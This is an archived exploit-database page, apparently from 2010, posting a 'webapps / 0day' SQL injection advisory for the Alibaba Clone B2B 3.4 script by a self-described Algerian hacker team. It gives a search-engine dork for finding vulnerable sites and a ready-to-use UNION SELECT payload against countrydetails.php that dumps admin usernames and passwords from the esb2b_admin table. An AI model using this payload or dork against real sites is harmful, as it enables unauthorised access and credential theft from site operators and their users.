[webapps / 0day] - Alibaba Clone B2B 3.4 SQL Injection Vulne
Posted on 01 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Alibaba Clone B2B 3.4 SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Alibaba Clone B2B 3.4 SQL Injection Vulnerability by Dr.0rYX in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================= Alibaba Clone B2B 3.4 SQL Injection Vulnerability ================================================= Exploit Title:Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability Date: 29.11.2010 Author: Dr.0rYX and Cr3w-DZ Category: webapps/0day *************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / / /_ \_ __ | | | | ______ \__ | __) \_ __ |/ ___\__ * * | | \_/ | /| | | Y /_____/ / __ \_| | | / \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * / / / / / / / * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___| | \_ __ __< | | __/ __ \__ / * * \___ \ ___/ \___| | /| | / || | \___ | | | ___/ / __ | Y Y * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * / / / / / / / * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> ***************************************************************************/ [!] notice : Dr.0rYX: MY OLD EMAIL VX3@HOTMAIL.DE CLOSED MY NEW EMAIL IS SNIPER-DZ@HOTMAIL.DE ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.alibabaclone.com/ [+] script : Alibaba v3.4 clone b2b [+] Download : http://www.alibabaclone.com/ (sell script ) [+] Vulnerability : SQL injection [+] Dork : inurl:"countrydetails.php?es_id=" **************************************************************************/ [ Vulnerable File ] http://server/countrydetails.php?es_id=sql[N.A.S.T ] [ Exploit ] http://server/countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin-- [ GReet ] [+] : evilzone.org , exploit-db.com ,Inj3ct0r 1337 Exploit DataBase 1337db.com , ALL HACKERS MUSLIMS # <a href='http://1337db.com/'>1337db.com</a> [2010-12-01]</pre></body></html>
